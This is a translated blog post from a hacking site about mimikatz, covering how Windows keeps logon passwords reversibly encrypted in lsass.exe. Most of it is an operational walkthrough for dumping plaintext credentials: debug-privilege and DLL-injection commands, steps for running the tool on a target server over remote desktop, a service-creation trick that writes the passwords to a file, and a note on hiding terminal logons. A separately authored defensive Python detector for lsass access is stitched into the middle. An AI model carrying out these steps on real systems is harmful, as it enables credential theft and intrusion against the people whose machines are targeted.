Lightweight debugger mimikatz directly captures Windows plaintext passwords!

Source: Internet
Author: User

Yesterday a friend sent me a tool written by a French hacker, called mimikatz.
Let's take a look.

Project page:

http://blog.gentilkiwi.com/mimikatz

There is also an article that uses this tool to obtain the plaintext passwords of active Windows accounts directly from lsass.exe:

http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

I tested it on Win2008 R2 x64.


The wdigest entry shows my plaintext password.

I also tested a more complex password, longer than 14 characters and containing uppercase and lowercase letters and special characters; the plaintext was still captured.

wce.exe or lslsass.exe can at most recover the LM hash and NTLM hash of active accounts from memory.

Now that the plaintext password itself can be captured, we can infer that lsass.exe holds not only the LM hash and NTLM hash, but also the plaintext password under some encryption algorithm (note: encryption is not hashing; encryption is reversible, a hash is irreversible).

Because that encryption is reversible, the data can be decrypted back to the plaintext.

Therefore sekurlsa.dll should contain the corresponding decryption algorithm.

If you have a good reverse-engineering background, you could try analysing it.

In my opinion, though, this tool really behaves more like a lightweight debugger.

It can raise its own privileges, inject into a process, and read that process's memory.

The following is an example of reading the memory of the Minesweeper game.

We can also use the pause command to suspend the process; at that point the game clock stops.

In short, this tool is pretty impressive and has plenty more capabilities for hackers to dig into =... = ~

Webmaster comment:

Capture users' plaintext passwords from lsass.exe:

// raise privileges
privilege::debug
// inject the DLL
inject::process lsass.exe sekurlsa.dll
// capture the passwords
@getLogonPasswords

Tested, works on all of:

Windows XP (partially)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1

It seems only Windows 2000 is not supported; at least Windows XP and up work.

However, 2000/XP can use the earlier findpassword tool; from Windows 2003 through Windows 7, Microsoft's handling has not changed.

Domain accounts work too; in theory it is fine, since whoever has logged on is in lsass.exe.

The principle is that the password entered at login is encrypted by the wdigest and tspkg modules in lsass.exe after they are called, and is never erased; the encrypted data can be located by its signature and, since Microsoft's algorithm is reversible, decrypted.

Once a user has logged on, the password can be captured and enumerated. It's all Microsoft's fault.

Put simply, when a user logs on to Windows, lsass.exe encrypts the plaintext password with a reversible algorithm and keeps it in memory without ever cleaning it up, so it can be captured and recovered.

That is, once the system is up, as long as a user has logged on, the password can be captured until the next restart (the memory is cleared by a restart; this does not count other methods of wiping memory). Logging off does not help, because the password in memory is not cleared, so it can still be captured.

I think Microsoft may issue a patch to clear this...

This plug-in has many other functions; see the parameters. For example, ts calls mimikatz.sys to hide terminal logons.

This should count as a password leak and a very serious vulnerability. I expect Microsoft will issue a patch.

3:10:48 supplement:

The Pediy (看雪) forum has a post with a detailed analysis of the principle, still being updated: http://bbs.pediy.com/showthread.php?t=146884

How to capture passwords in a remote terminal session (3389 / mstsc.exe) or on a virtual desktop:

Usually, when you run the program in a remote terminal session, the system reports: Not enough storage is available to process this command.

This is because in terminal mode a remote thread cannot be created and injection across sessions is not possible. You need to run the program as follows:

First, extract a few files. If you only want to capture passwords, you need only these:

mimikatz_trunk\tools\cmdxec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

Upload the archive to the target server and extract it. Note that the path must not contain Chinese characters (spaces are allowed)! Otherwise DLL loading fails with an error that the file cannot be found.

Use any of the following methods to capture the password:

// The simplest and most practical method: start with cmdxec.exe
// Run cmd.exe under the SYSTEM account, or run mimikatz.exe directly
cmdxec -s cmd.exe
// start mimikatz.exe
c:\mimikatz_trunk\Win32\mimikatz.exe
// raise privileges
privilege::debug
// inject the DLL. Use the absolute path! The path must not contain Chinese characters (spaces are allowed)!
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
// capture the passwords
@getLogonPasswords
// exit; do not use Ctrl+C, it sends mimikatz.exe into an endless loop at 100% CPU
exit
//********************************************************
// start via at ***
//********************************************************
// service creation method
sc create GetPassword binpath= "cmd.exe /c c:\XXX\mimikatz.exe < command.txt > password.txt"
sc start GetPassword
sc delete GetPassword
//********************************************************
// telnet: a remote command pipeline
telnet ****
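For the defender's side of the access pattern described above (debug privilege, DLL injection into lsass.exe, then reading its memory), here is an added detection example in Python; it is not part of the original post or of mimikatz. It assumes process-access records shaped like Sysmon Event ID 10 (SourceImage, TargetImage, GrantedAccess), and the sample events and allowlist are constructed for illustration.

```python
"""Flag suspicious opens of lsass.exe in process-access telemetry.

Added example, not from the original post or from mimikatz. Record shape
(source image, target image, granted access mask) follows Sysmon Event ID 10;
the sample events and the allowlist below are constructed assumptions.
"""
from dataclasses import dataclass

# Windows process access rights (winnt.h)
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Injecting a DLL with a remote thread needs all three; a plain memory dump needs VM_READ.
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Processes that legitimately open lsass.exe on a typical host (assumption; baseline per environment).
ALLOWED_SOURCES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


@dataclass
class ProcessAccess:
    source_image: str
    target_image: str
    granted_access: int


def classify(ev: ProcessAccess):
    """Return None for benign events, otherwise a short verdict string."""
    if not ev.target_image.lower().endswith(r"\lsass.exe"):
        return None
    if ev.source_image.lower() in ALLOWED_SOURCES:
        return None
    if ev.granted_access & INJECT_MASK == INJECT_MASK:
        return "lsass-injection"      # remote thread + write: the inject::process pattern
    if ev.granted_access & PROCESS_VM_READ:
        return "lsass-memory-read"    # read-only dump of lsass memory
    return None


def scan(events):
    """Return (source image, verdict) for every event that is not benign."""
    return [(ev.source_image, v) for ev in events if (v := classify(ev))]


# Constructed sample events: one benign service, one injection, one memory read.
SAMPLE_EVENTS = [
    ProcessAccess(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\lsass.exe", 0x1000),
    ProcessAccess(r"C:\mimikatz_trunk\Win32\mimikatz.exe", r"C:\Windows\System32\lsass.exe", 0x143A),
    ProcessAccess(r"C:\tools\dumper.exe", r"C:\Windows\System32\lsass.exe", 0x1010),
]

if __name__ == "__main__":
    for src, verdict in scan(SAMPLE_EVENTS):
        print(f"{verdict}: {src}")
```

The allowlist is only a starting point; baseline which processes actually open lsass.exe on your hosts before alerting on the rest.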

Some content is taken from: http://hi.baidu.com/hackercasper/blog/item/b080dbd05eb6a5cc562c8461.html

This article, "Lightweight debugger mimikatz directly captures Windows plaintext passwords!", is from nuclear'ATK Network Security Research Center; article address: http://lcx.cc/?i=2265. Please credit the author and source when reproducing it!
